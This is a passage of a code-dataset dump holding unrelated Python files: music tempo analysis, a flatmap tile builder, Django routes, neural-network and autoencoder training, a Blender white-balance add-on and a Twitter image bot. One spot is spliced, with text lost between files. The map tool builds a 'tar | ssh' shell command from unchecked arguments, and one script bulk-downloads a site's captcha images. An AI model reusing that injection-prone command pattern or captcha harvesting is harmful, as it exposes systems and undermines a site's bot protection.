","sub_path":"Ogrenciler/Erdogan-Canbay/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"483073828","text":"from music21 import converter\nfrom glob import glob\n\n\ndef avg_tempos():\n res = {}\n for genre in glob('midi_files/*'):\n avg = 0\n for midi in glob(genre+'/*'):\n s = converter.parse(midi)\n m = s.metronomeMarkBoundaries()[0][2]\n avg += m.number\n avg = int(avg/33)\n genre = genre.replace('midi_files\\\\', '')\n res[genre] = avg\n return res\n\n\nif __name__ == '__main__':\n print(avg_tempos())\n","sub_path":"tempocheck.py","file_name":"tempocheck.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131436477","text":"import numpy as np\nfrom sympy import *\nimport matplotlib.pyplot as plt\n\n# m>n for left inverse, # TAll matrix\n# m args.max_zoom:\n sys.exit('--min-zoom must be between 0 and {}'.format(args.max_zoom))\n if args.max_zoom < args.min_zoom or args.max_zoom > 15:\n sys.exit('--max-zoom must be between {} and 15'.format(args.min_zoom))\n if args.initial_zoom < args.min_zoom or args.initial_zoom > args.max_zoom:\n sys.exit('--initial-zoom must be between {} and {}'.format(args.min_zoom, args.max_zoom))\n\n map_zoom = (args.min_zoom, args.max_zoom, args.initial_zoom)\n\n if args.tile_slide > 0:\n args.background_tiles = True\n args.no_vector_tiles = True\n\n if args.powerpoint.startswith('http:') or args.powerpoint.startswith('https:'):\n response = requests.get(args.powerpoint)\n if response.status_code != requests.codes.ok:\n sys.exit('Cannot retrieve remote Powerpoint file')\n pptx_source = args.powerpoint\n pptx_modified = 0 ## Can we get timestamp from PMR metadata?? Or even i\n pptx_bytes = io.BytesIO(response.content)\n map_source = pptx_source\n else:\n if not os.path.exists(args.powerpoint):\n sys.exit('Missing Powerpoint file')\n pptx_source = os.path.abspath(args.powerpoint)\n pptx_modified = os.path.getmtime(pptx_source)\n pptx_bytes = open(pptx_source, 'rb')\n map_source = 'file:/{}'.format(pptx_source)\n\n if args.background_tiles:\n pdf_source = '{}.pdf'.format(os.path.splitext(pptx_source)[0])\n if pdf_source.startswith('http:') or pdf_source.startswith('https:'):\n response = requests.get(pdf_source)\n if response.status_code != requests.codes.ok:\n pptx_bytes.close()\n sys.exit('Cannot retrieve PDF of Powerpoint (needed to generate background tiles)')\n pdf_bytes = io.BytesIO(response.content)\n else:\n if not os.path.exists(pdf_source):\n pptx_bytes.close()\n sys.exit('Missing PDF of Powerpoint (needed to generate background tiles)')\n if os.path.getmtime(pdf_source) < pptx_modified:\n pptx_bytes.close()\n sys.exit('PDF of Powerpoint is too old...')\n with open(pdf_source, 'rb') as f:\n pdf_bytes = f.read()\n\n map_dir = os.path.join(args.map_base, args.map_id)\n args.output_dir = map_dir\n\n args.label_database = os.path.join(args.map_base, 'labels.sqlite')\n\n map_models = ''\n\n if not os.path.exists(map_dir):\n os.makedirs(map_dir)\n\n#* # Labels and relationships between anatomical entities\n\n#* args.ontology_data = OntologyData()\n#* args.layer_mapping = LayerMapping('./layers.json', 'features')\n\n filenames = []\n upload_files = ['index.mbtiles']\n\n print('Extracting layers...')\n map_extractor = GeoJsonExtractor(pptx_bytes, args)\n\n # Process slides, saving layer information\n\n annotations = {}\n map_layers = []\n pathways_list = []\n tippe_inputs = []\n for slide_number in range(1, len(map_extractor)+1):\n if args.tile_slide > 0 and args.tile_slide != slide_number:\n continue\n\n layer = map_extractor.slide_to_layer(slide_number,\n debug_xml=args.debug_xml)\n for error in layer.errors:\n print(error)\n\n if layer.zoom is not None:\n map_zoom = layer.zoom\n\n map_layer = {\n 'id': layer.layer_id,\n 'slide-id': layer.slide_id,\n 'description': layer.description,\n 'selectable': layer.selectable,\n 'selected': layer.selected,\n 'queryable-nodes': layer.queryable_nodes,\n 'features': layer.map_features\n }\n if layer.background_for:\n map_layer['background_for'] = layer.background_for\n map_layers.append(map_layer)\n if layer.resolved_pathways is not None:\n pathways_list.append(layer.resolved_pathways)\n\n if layer.models:\n map_models = layer.models\n\n if layer.selectable:\n annotations.update(layer.annotations)\n for (layer_name, filename) in layer.save().items():\n filenames.append(filename)\n tippe_inputs.append({\n 'file': filename,\n 'layer': layer_name,\n 'description': '{} -- {}'.format(layer.description, layer_name)\n })\n\n # We are finished with the Powerpoint\n\n pptx_bytes.close()\n\n if len(map_layers) == 0:\n sys.exit('No map layers in Powerpoint...')\n\n if args.check_errors:\n # Show what the map is about\n if map_models:\n print('Checked map for {}'.format(map_models))\n\n else:\n\n layer_ids = [layer['id'] for layer in map_layers]\n\n # Get our map's actual bounds and centre\n\n bounds = map_extractor.bounds()\n map_centre = [(bounds[0]+bounds[2])/2, (bounds[1]+bounds[3])/2]\n map_bounds = [bounds[0], bounds[3], bounds[2], bounds[1]] # southwest and northeast ccorners\n\n # The vector tiles' database\n\n mbtiles_file = os.path.join(map_dir, 'index.mbtiles')\n\n if len(tippe_inputs) == 0:\n sys.exit('No selectable layers in Powerpoint...')\n\n # Generate Mapbox vector tiles\n print('Running tippecanoe...')\n\n subprocess.run(['tippecanoe', '--projection=EPSG:4326', '--force',\n # No compression results in a smaller `mbtiles` file\n # and is also required to serve tile directories\n '--no-tile-compression',\n '--buffer=100',\n '--minimum-zoom={}'.format(map_zoom[0]),\n '--maximum-zoom={}'.format(map_zoom[1]),\n '--output={}'.format(mbtiles_file),\n ]\n + list([\"-L{}\".format(json.dumps(input)) for input in tippe_inputs])\n )\n\n # `tippecanoe` uses the bounding box containing all features as the\n # map bounds, which is not the same as the extracted bounds, so update\n # the map's metadata\n\n tile_db = MBTiles(mbtiles_file)\n\n tile_db.update_metadata(center=','.join([str(x) for x in map_centre]),\n bounds=','.join([str(x) for x in map_bounds]))\n\n tile_db.execute(\"COMMIT\")\n\n if args.tile_slide == 0:\n # Save path of the Powerpoint source\n tile_db.add_metadata(source=map_source) ## We don't always want this updated...\n ## e.g. if re-running after tile generation\n # What the map models\n if map_models:\n tile_db.add_metadata(describes=map_models)\n\n # Save layer details in metadata\n tile_db.add_metadata(layers=json.dumps(map_layers))\n\n # Save pathway details in metadata\n tile_db.add_metadata(pathways=pathways_to_json(pathways_list))\n\n # Save annotations in metadata\n tile_db.add_metadata(annotations=json.dumps(annotations))\n\n # Save command used to run mapmaker\n tile_db.add_metadata(created_by=' '.join(sys.argv))\n\n # Save the maps creation time\n tile_db.add_metadata(created=datetime.datetime.utcnow().isoformat())\n\n#* ## TODO: set ``layer.properties`` for annotations...\n#* ##update_RDF(args.map_base, args.map_id, map_source, annotations)\n # Commit updates to the database\n tile_db.execute(\"COMMIT\")\n\n\n\n print('Creating style files...')\n\n map_index = {\n 'id': args.map_id,\n 'min-zoom': map_zoom[0],\n 'max-zoom': map_zoom[1],\n 'bounds': map_bounds,\n 'version': FLATMAP_VERSION,\n 'image_layer': (args.background_tiles\n or os.path.isfile(os.path.join(map_dir, '{}.mbtiles'.format(layer_ids[0])))),\n }\n\n if map_models:\n map_index['describes'] = map_models\n\n # Create `index.json` for building a map in the viewer\n\n with open(os.path.join(map_dir, 'index.json'), 'w') as output_file:\n json.dump(map_index, output_file)\n\n # Create style file\n\n metadata = tile_db.metadata()\n\n style_dict = Style.style(layer_ids, metadata, map_zoom)\n with open(os.path.join(map_dir, 'style.json'), 'w') as output_file:\n json.dump(style_dict, output_file)\n\n # Create TileJSON file\n\n json_source = tile_json(args.map_id, map_zoom, map_bounds)\n with open(os.path.join(map_dir, 'tilejson.json'), 'w') as output_file:\n json.dump(json_source, output_file)\n\n upload_files.extend(['index.json', 'style.json', 'tilejson.json'])\n\n if args.tile_slide == 0:\n # We are finished with the tile database, so close it\n tile_db.close();\n\n if args.background_tiles:\n print('Generating background tiles (may take a while...)')\n upload_files.extend(make_background_tiles(map_bounds, map_zoom, map_dir,\n pdf_source, pdf_bytes, layer_ids, args.tile_slide))\n\n # Show what the map is about\n if map_models:\n print('Generated map for {}'.format(map_models))\n\n if args.upload:\n upload = ' '.join([ '{}/{}'.format(args.map_id, f) for f in upload_files ])\n cmd_stream = os.popen('tar -C {} -c -z {} | ssh {} \"tar -C /flatmaps -x -z\"'\n .format(args.map_base, upload, args.upload))\n print('Uploaded map...', cmd_stream.read())\n\n # Tidy up\n print('Cleaning up...')\n\n for filename in filenames:\n if args.save_geojson:\n print(filename)\n else:\n os.remove(filename)\n\n#===============================================================================\n\nif __name__ == '__main__':\n main()\n\n#===============================================================================\n","sub_path":"mapmaker/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":14285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573517604","text":"from django.conf.urls import url, include\nfrom restaurant import views\n\nurlpatterns = [\n # url(r'^$', views.API.as_view(), name='home-view'),\n url(r'^$', views.list, name='home'),\n url(r'^new$', views.new, name='new'),\n url(r'^search$', views.search, name='search'),\n url(r'^(?P[0-9]+)/edit/$', views.update, name='update'),\n url(r'^restaurants/delete/$', views.delete, name='delete'),\n url(r'^(?P[0-9]+)/menus/', include('menu.urls')),\n]\n","sub_path":"mymenu/restaurant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"299374251","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: ‘yuxuecheng‘\n@contact: yuxuecheng@baicdata.com\n@software: PyCharm Community Edition\n@file: get_picture.py.py\n@time: 2017/4/24 上午10:00\n\"\"\"\n\nimport urllib2\n\npicture_url = \"http://121.40.187.211:8080/index.php/Public/verify/0.7356425633784405\"\n\nif __name__ == '__main__':\n for index in range(1000):\n response = urllib2.urlopen(picture_url)\n content = response.read()\n picture_name = \"data/%d.bmp\" % index\n with open(picture_name, mode='w') as fd:\n fd.write(content)\n","sub_path":"scikit_learn/examples/Recognizing-hand-written-digits/get_picture.py","file_name":"get_picture.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"79231785","text":"import numpy as np\nfrom activations import Relu\nfrom activations import Linear\nfrom dropout import DropNull\nimport random\n\nclass MatrixNetwork:\n \"\"\"The code for this class is a modified version of that provided in Michael Nielsen's\n fantastic free book: http://neuralnetworksanddeeplearning.com\n \"\"\"\n\n def __init__(self, weights, biases, activations, name='network', drop_scheme=None):\n \"\"\"Create a neural network, specified by the layers which have varying sizes and activations\"\"\"\n self.num_layers = len(weights)+1\n self.weights = weights\n self.biases = biases\n self.activations = activations\n self.name = name\n #self.drop_scheme = drop_scheme\n\n def feedforward(self, a):\n # Return the output of the network of 'a' is input\n for b, w, act in zip(self.biases, self.weights, self.activations):\n z = act.weighted_sum(w, b, a)\n a = act.apply(z)\n return a\n\n def feedforward_to(self, a, l):\n \"\"\"Only feedforward to the layer l\"\"\"\n current_layer = 0;\n for b, w, act, in zip(self.biases, self.weights, self.activations):\n if current_layer == l:\n break\n z = act.weighted_sum(w, b, a)\n a = act.apply(z)\n current_layer += 1\n return a\n\n def update_mini_batch(self, mini_batch, epoch):\n #self.drop_scheme.new_batch()\n \"\"\"Update the network's weights and biases by applying\n gradient descent using backpropagation using a single mini batch.\n The 'mini_batch' is a list of tuples (x, y) and eta\n is the learning rate\"\"\"\n d, m = mini_batch[0].shape\n nabla_w, nabla_b, dzs = self.get_grads_for_mini_batch(mini_batch)\n #nabla_w = self.drop_scheme.drop_grads(nabla_w)\n if epoch > 20:\n self.weights = [act.opt().update_weights(w, dw, m)\n for w, dw, act in zip(self.weights,nabla_w, self.activations)]\n self.biases = [act.opt().update_biases(b, db, m)\n for b, db, act in zip(self.biases, nabla_b, self.activations)]\n return nabla_w, nabla_b, dzs\n\n def get_grads_for_mini_batch(self, mini_batch):\n x, y = mini_batch\n return self.backprop(x, y)\n # nabla_b = self.backprop(mini_bax, ytch)\n # nabla_w = [np.zeros(w.shape) for w in self.weights]\n # dzs = []\n # for x, y in mini_batch:\n # delta_nabla_b, delta_nabla_w, dz = self.backprop(x, y)\n # nabla_b = [nb + dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]\n # nabla_w = [nw + dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]\n # dzs.append(dz)\n # return nabla_w, nabla_b, dzs\n\n\n def backprop(self, x, y):\n \"\"\"Return a tuple ``(nabla_b, nabla_w)`` representing the\n gradient for the cost function C_x. ``nabla_b`` and\n ``nabla_w`` are layer-by-layer lists of numpy arrays, similar\n to ``self.biases`` and ``self.weights``.\"\"\"\n nabla_b = [None for b in self.biases]\n nabla_w = [None for w in self.weights]\n nabla_z = []\n # feedforward\n a = x\n a_values = [x] # list to store all the activations, layer by layer\n #weights = self.drop_scheme.drop_weights(self.weights)\n weights = self.weights\n for b, w, act in zip(self.biases, weights, self.activations):\n z = act.weighted_sum(w, b, a)\n a = act.apply(z)\n a_values.append(a)\n\n # backward pass\n act = self.activations[-1]\n delta = self.cost_derivative(a, y) * act.prime(a_values[-1])\n nabla_z.append(delta)\n nabla_w[-1], nabla_b[-1] = act.weight_grad(delta, a_values[-2])\n nabla_b[-1] = np.sum(nabla_b[-1], axis=1).reshape(self.biases[-1].shape)\n for l in xrange(2, self.num_layers):\n act = self.activations[-l]\n ap = act.prime(a_values[-l])\n delta = np.matmul(weights[-l+1].transpose(), delta) * ap\n nabla_z.append(delta)\n nabla_w[-l], nabla_b[-l] = act.weight_grad(delta, a_values[-l - 1])\n nabla_b[-l] = np.sum(nabla_b[-l], axis=1).reshape(self.biases[-l].shape)\n nabla_z.reverse()\n return nabla_w, nabla_b, nabla_z\n\n def cost_derivative(self, a, y):\n \"\"\"Return the vector of partial derivatives \\partial C_x /\n \\partial a for the output activations.\"\"\"\n return a - y\n\n def cost(self, batch):\n X, Y = batch\n A = self.feedforward(X)\n return 1 / 2.0 * np.sum((Y - A) ** 2.0)\n\n def cost_data_set(self, batches):\n return sum([self.cost(batch) for batch in batches])\n\n def half_weights(self):\n pass\n #self.drop_scheme.half_weights(self.weights)\n\n def double_weights(self):\n pass\n #self.drop_scheme.double_weights(self.weights)\n\n","sub_path":"srcNN/network/network_matrix.py","file_name":"network_matrix.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"156477152","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nimport tensorlayer as tl\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ntl.logging.set_verbosity(tl.logging.DEBUG)\n\nmnist = input_data.read_data_sets(train_dir=\"D:/mnist\")\ntrain_mnist = tf.data.Dataset.from_tensor_slices(tensors=(mnist.train.images))\ntrain_mnist_iterator = train_mnist.repeat().batch(batch_size=250).make_initializable_iterator()\nnext_batch = train_mnist_iterator.get_next()\n\n# 定义学习率\nlearning_rate = 0.01\n\n# 隐含层设置\n\nn_hidden_1 = 256\nn_hidden_2 = 64\nn_hidden_3 = 16\nn_hidden_4 = 2\n\nn_input = 784\n\n# 定义输入占位符\nX = tf.placeholder(dtype=tf.float32, shape=(None, n_input))\n\n\ndef encoder_network(inputs, isTrain=True, reuse=False):\n with tf.variable_scope(name_or_scope=\"encoder\", reuse=reuse):\n network = tl.layers.InputLayer(inputs=inputs, name=\"inputs\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_1, act=tf.nn.sigmoid, name=\"encoder_hidden_1\")\n network = tl.layers.DropoutLayer(prev_layer=network, keep=0.5, name=\"drop_1\", is_train=isTrain, is_fix=True)\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_2, act=tf.nn.sigmoid, name=\"encoder_hidden_2\")\n network = tl.layers.DropoutLayer(prev_layer=network, keep=0.5, name=\"drop_2\", is_train=isTrain, is_fix=True)\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_3, act=tf.nn.sigmoid, name=\"encoder_hidden_3\")\n network = tl.layers.DropoutLayer(prev_layer=network, keep=0.5, name=\"drop_3\", is_train=isTrain, is_fix=True)\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_4, act=tf.nn.sigmoid, name=\"encoder_outputs\")\n return network\n\n\ndef decoder_network(inputs, reuse):\n with tf.variable_scope(name_or_scope=\"decoder\", reuse=reuse):\n network = tl.layers.DenseLayer(prev_layer=inputs, n_units=n_hidden_3, act=tf.nn.sigmoid, name=\"decoder_hidden_1\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_2, act=tf.nn.sigmoid, name=\"decoder_hidden_2\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_hidden_1, act=tf.nn.sigmoid, name=\"decoder_hidden_3\")\n network = tl.layers.DenseLayer(prev_layer=network, n_units=n_input, act=tf.nn.sigmoid, name=\"decoder_outputs\")\n return network\n\n\ntrain_encoder_net = encoder_network(inputs=X, isTrain=True, reuse=False)\ntest_encoder_net = encoder_network(inputs=X, isTrain=False, reuse=True)\ntrain_decoder_net = decoder_network(inputs=train_encoder_net, reuse=False)\ntest_decoder_net = decoder_network(inputs=test_encoder_net, reuse=True)\n# 添加正则化罚项\nl2_loss_list = []\nfor var in train_encoder_net.all_params:\n l2_loss_list.append(tf.nn.l2_loss(var))\n\nl2_loss = tf.reduce_mean(l2_loss_list)\n\ntrain_decoder_outputs = train_decoder_net.outputs\ntest_decoder_outputs = test_decoder_net.outputs\n\nmse = tf.reduce_mean(tf.reduce_sum(tf.squared_difference(x=train_decoder_outputs, y=X), axis=1))\n\nloss = mse + 0.001 * l2_loss\n\ntrain_step = tf.train.AdamOptimizer(learning_rate=1e-3).minimize(loss=loss)\n\nsaver = tf.train.Saver()\ncheckpoint = tf.train.get_checkpoint_state(checkpoint_dir=\"checkpoint\")\n\nwith tf.Session() as sess:\n sess.run(train_mnist_iterator.initializer)\n sess.run(tf.global_variables_initializer())\n\n if checkpoint != None and checkpoint.model_checkpoint_path != None:\n saver.restore(sess=sess, save_path=checkpoint.model_checkpoint_path)\n\n for epoch in range(100):\n total_loss = 0\n for batch in range(220):\n X_train = sess.run(fetches=next_batch)\n _, get_loss = sess.run(fetches=[train_step, loss], feed_dict={X: X_train})\n total_loss += get_loss\n saver.save(sess=sess, save_path=\"checkpoint/model.ckpt\", global_step=epoch)\n print(\"epoch:\", epoch + 1, \"total loss:\", total_loss)\n","sub_path":"TensorFlow/使用自编码网络提取图片2维特征/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"23134459","text":"import bpy\n\nimport bgl\nimport math\n\nfrom .functions import srgb_to_linear\nfrom . import camera\nfrom bpy.props import BoolProperty\n\n# Default Global variables\ndefault_color_temperature = 6500\ndefault_tint = 0\nstored_cm_view_transform = 'Filmic'\ntemperature_ratio = ((23.1818,2000),(6.2195,2200),(4.25,2400),(3.0357,2700),(2.4286,3000),(2.0565,3300),(1.8085,3600),(1.6038,3900),(1.5839,4300),(1.25,5000),(1.0759,6000),(1,6500),(0.8980,8000),(0.851,9000),(0.8118,10000),(0.7843,11000),(0.7647,12000),(0.4706,13000),(0.1176,14000))\n\n#White Balance functions ##############################################################\n\ndef convert_RGB_to_temperature_table(red, blue):\n\n\ttable_ratio = camera.InterpolatedArray(temperature_ratio)\n\n\t# Min and Max ratios from the table\n\tmaxratio = 23.1818\n\tminratio = 0.1176\n\n\t# Make sure to not divide by 0\n\tif blue == 0:\n\t\tratio = minratio\n\telse: ratio = red / blue\n\n\t#Clamping ratio to avoid looking outside of the table\n\tratio = maxratio if ratio > maxratio else minratio if ratio < minratio else ratio\n\n\tcolor_temperature = table_ratio[ratio]\n\n\treturn (color_temperature)\n\ndef convert_RBG_to_whitebalance(picked_color,use_scene_camera):\n\tif use_scene_camera:\n\t\tsettings = bpy.context.scene.camera.data.photographer\n\telse:\n\t\tsettings = bpy.context.camera.photographer\n\t#Need to convert picked color to linear\n\tred = srgb_to_linear(picked_color[0])\n\tgreen = srgb_to_linear(picked_color[1])\n\tblue = srgb_to_linear(picked_color[2])\n\n\taverage = (red + blue) / 2\n\n\t# Calculating Curves values\n\tred_mult = red / average\n\tgreen_mult = green / average\n\tblue_mult = blue / average\n\n\t# # Accurate multiplier to test accuracy of color temperature conversion\n\t# bpy.context.scene.view_settings.curve_mapping.white_level[0] = red_mult\n\t# bpy.context.scene.view_settings.curve_mapping.white_level[1] = green_mult\n\t# bpy.context.scene.view_settings.curve_mapping.white_level[2] = blue_mult\n\n\t# Convert Curve value to Tint\n\tif green_mult < 1 :\n\t\tsettings.tint = (green_mult - 1) * 200 # Reverse Tint Math\n\telse:\n\t\tsettings.tint = (green_mult - 1) * 50 # Reverse Tint Math\n\n\t# Convert Curve value to Temperature\n\tsettings.color_temperature = convert_RGB_to_temperature_table(red_mult,blue_mult)\n\ndef set_picked_white_balance(picked_color,use_scene_camera):\n\tconvert_RBG_to_whitebalance(picked_color,use_scene_camera)\n\nclass PHOTOGRAPHER_OT_WBReset(bpy.types.Operator):\n\tbl_idname = \"white_balance.reset\"\n\tbl_label = \"Reset White Balance\"\n\tbl_description = \"Reset White Balance\"\n\tbl_options = {'UNDO'}\n\n\tuse_scene_camera: BoolProperty(default=False)\n\t\n\tdef execute(self, context):\n\t\tif self.use_scene_camera:\n\t\t\tcontext.scene.camera.data.photographer.color_temperature = default_color_temperature\n\t\t\tcontext.scene.camera.data.photographer.tint = default_tint\t\t\t\n\t\telse:\n\t\t\tcontext.camera.photographer.color_temperature = default_color_temperature\n\t\t\tcontext.camera.photographer.tint = default_tint\n\t\treturn{'FINISHED'}\n\nclass PHOTOGRAPHER_OT_WBPicker(bpy.types.Operator):\n\tbl_idname = \"white_balance.picker\"\n\tbl_label = \"Pick White Balance\"\n\tbl_description = \"Pick a grey area in the 3D view to adjust the White Balance\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t# Create stored values for cancelling\n\tstored_color_temperature = 6500\n\tstored_tint = 0\n\tstored_cm_display_device = \"sRGB\"\n\tstored_cm_view_transform = \"Filmic\"\n\n\tstored_cm_look = \"None\"\n\t\n\tuse_scene_camera: BoolProperty(default=False)\n\n\tdef modal(self, context, event):\n\t\t#context.area.tag_redraw()\n\n\t\t# Reset White Balance to pick raw image, not an already white balanced one\n\t\tif self.use_scene_camera:\n\t\t\tif context.scene.camera.data.photographer.color_temperature != default_color_temperature:\n\t\t\t\tcontext.scene.camera.data.photographer.color_temperature = default_color_temperature\n\t\t\tif context.scene.camera.data.photographer.tint != default_tint:\t\n\t\t\t\tcontext.scene.camera.data.photographer.tint = default_tint\t\t\n\t\telse:\n\t\t\tif context.camera.photographer.color_temperature != default_color_temperature:\n\t\t\t\tcontext.camera.photographer.color_temperature = default_color_temperature\n\t\t\tif context.camera.photographer.tint != default_tint:\n\t\t\t\tcontext.camera.photographer.tint = default_tint\n\t\n\t\t# Disabling color management to be able to convert picked color easily\n\t\tif\tcontext.scene.display_settings.display_device != \"sRGB\":\n\t\t\tcontext.scene.display_settings.display_device = \"sRGB\"\n\t\tif context.scene.view_settings.view_transform != \"Standard\":\n\t\t\tcontext.scene.view_settings.view_transform = \"Standard\"\n\n\t\t# Allow navigation for Blender and Maya shortcuts\n\t\tif event.type in {'MIDDLEMOUSE', 'WHEELUPMOUSE', 'WHEELDOWNMOUSE'} or event.alt and event.type == 'LEFTMOUSE' or event.alt and event.type == 'RIGHTMOUSE':\n\t\t\treturn {'PASS_THROUGH'}\n\n\t\tif event.type == 'LEFTMOUSE':\n\n\t\t\t# Picking color when releasing left mouse button\n\t\t\tif event.value == 'RELEASE' and not self.record:\n\n\t\t\t\tself.record = True\n\t\t\t\tself.mouse_position=(event.mouse_x, event.mouse_y)\n\t\t\t\t# Restore Mouse Cursor from Eyedropper Icon\n\t\t\t\tif self.cursor_set: context.window.cursor_modal_restore()\n\n\t\t\t\tbuf = bgl.Buffer(bgl.GL_FLOAT, [1, 3])\n\t\t\t\tx,y = self.mouse_position\n\n\t\t\t\tred = 0\n\t\t\t\tgreen = 0\n\t\t\t\tblue = 0\n\n\t\t\t\t#Sample a 9*9 pixels square\n\t\t\t\tfor i in range(x-4, x+4):\n\t\t\t\t\tfor j in range(y-4, y+4):\n\t\t\t\t\t\tbgl.glReadPixels(i, j, 1,1 , bgl.GL_RGB, bgl.GL_FLOAT, buf)\n\t\t\t\t\t\tred = red + buf[0][0]\n\t\t\t\t\t\tgreen = green + buf[0][1]\n\t\t\t\t\t\tblue = blue + buf[0][2]\n\n\t\t\t\taverage_r = red / 81\n\t\t\t\taverage_g = green / 81\n\t\t\t\taverage_b = blue / 81\n\n\t\t\t\taverage = [average_r,average_g,average_b]\n\n\t\t\t\t# Sampling pixels under the mouse when released\n\t\t\t\t# bgl.glReadPixels(x, y, 1,1 , bgl.GL_RGB, bgl.GL_FLOAT, buf)\n\t\t\t\t# rgb = buf[0]\n\t\t\t\t# Calculate and apply Color Temperature and Tint\n\t\t\t\tset_picked_white_balance(average,self.use_scene_camera)\n\n\t\t\t\t# Restore Color Management Settings\n\t\t\t\tcontext.scene.display_settings.display_device = self.stored_cm_display_device\n\t\t\t\tcontext.scene.view_settings.view_transform = self.stored_cm_view_transform\n\n\t\t\t\tcontext.scene.view_settings.look = self.stored_cm_look\n\n\t\t\t\treturn {'FINISHED'}\n\n\t\telif event.type in {'RIGHTMOUSE', 'ESC'}:\n\t\t\t# Restore previous settings if cancelled\n\t\t\tif self.use_scene_camera:\n\t\t\t\tcontext.scene.camera.data.photographer.color_temperature = self.stored_color_temperature\n\t\t\t\tcontext.scene.camera.data.photographer.tint = self.stored_tint\n\t\t\telse:\n\t\t\t\tcontext.camera.photographer.color_temperature = self.stored_color_temperature\n\t\t\t\tcontext.camera.photographer.tint = self.stored_tint\n\t\t\t\t\n\t\t\t# Restore Color Management Settings\n\t\t\tcontext.scene.display_settings.display_device = self.stored_cm_display_device\n\t\t\tcontext.scene.view_settings.view_transform = self.stored_cm_view_transform\n\t\t\tcontext.scene.view_settings.look = self.stored_cm_look\n\n\t\t\t# Restore Mouse Cursor from Eyedropper Icon\n\t\t\tif self.cursor_set:\n\t\t\t\tcontext.window.cursor_modal_restore()\n\t\t\treturn {'CANCELLED'}\n\n\t\treturn {'RUNNING_MODAL'}\n\n\tdef invoke(self, context, event):\n\t\t\targs = (self, context)\n\t\t\tcontext.window_manager.modal_handler_add(self)\n\n\t\t\t# Set Cursor to Eyedropper icon\n\t\t\tcontext.window.cursor_modal_set('EYEDROPPER')\n\t\t\tself.cursor_set = True\n\t\t\tself.record = False\n\n\t\t\t# Store current white balance settings in case of cancelling\n\t\t\tif self.use_scene_camera:\n\t\t\t\tself.stored_color_temperature = context.scene.camera.data.photographer.color_temperature\n\t\t\t\tself.stored_tint = context.scene.camera.data.photographer.tint\n\t\t\telse:\n\t\t\t\tself.stored_color_temperature = context.camera.photographer.color_temperature\n\t\t\t\tself.stored_tint = context.camera.photographer.tint\n\n\t\t\tself.stored_cm_display_device = context.scene.display_settings.display_device\n\t\t\tself.stored_cm_view_transform = context.scene.view_settings.view_transform\n\n\t\t\tif context.scene.view_settings.look == \"\":\n\t\t\t\tself.stored_cm_look = \"None\"\n\t\t\telse:\n\t\t\t\tself.stored_cm_look = context.scene.view_settings.look\n\n\n\t\t\t# context.area.tag_redraw()\n\t\t\treturn {'RUNNING_MODAL'}","sub_path":"scripts/addons/photographer/white_balance.py","file_name":"white_balance.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"450004383","text":"__author__ = \"Chris Chalmers\"\r\n\r\nimport os, sys, urllib2, datetime\r\nfrom ConfigManager import ConfigManager\r\nfrom DBManager import DBManager\r\nfrom twython import Twython, TwythonError\r\n\r\nclass InspiroBot():\r\n\r\n def __init__(self):\r\n self.config = ConfigManager()\r\n self.dbManager = DBManager(self.config)\r\n self.urlOpener = urllib2.build_opener()\r\n self.urlOpener.addheaders = [('User-Agent', \"Mozilla/5.0\")]\r\n self.client = Twython(self.config.consumerKey,\r\n self.config.consumerSecret,\r\n self.config.accessTokenKey,\r\n self.config.accessTokenSecret)\r\n self.pathToImageDir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__), \"image\"))\r\n\r\n if not os.path.exists(self.pathToImageDir):\r\n os.makedirs(self.pathToImageDir)\r\n\r\n self.getImageURL()\r\n\r\n # Retrieve a URL from InspiroBot\r\n def getImageURL(self):\r\n link = self.urlOpener.open(self.config.inspiroURL).read()\r\n\r\n if not self.dbManager.ContainsLink(link):\r\n # Clear folder\r\n for f in os.listdir(self.pathToImageDir):\r\n os.remove(os.path.join(self.pathToImageDir, \"{}\".format(f)))\r\n\r\n # Download image\r\n print(\"Downloading images from {}...\".format(link))\r\n f = self.urlOpener.open(link)\r\n data = f.read()\r\n with open(os.path.join(self.pathToImageDir, \"image.jpg\"), \"wb\") as code:\r\n code.write(data)\r\n self.uploadImage(link)\r\n else:\r\n self.getImageURL() # Try again\r\n\r\n # Uploads image to Twitter\r\n def uploadImage(self, link):\r\n try:\r\n response = self.client.upload_media(media=open(os.path.join(self.pathToImageDir, \"image.jpg\"), 'rb'))\r\n self.client.update_status(status=\"Your daily #InspiroBot image\", media_ids=[response['media_id']])\r\n\r\n # Update DB\r\n self.dbManager.AddToDB(link)\r\n except TwythonError as e:\r\n print(\"Something went wrong uploading image: {}\".format(e))\r\n sys.exit(1)\r\n except Exception as e:\r\n print(\"Something went wrong 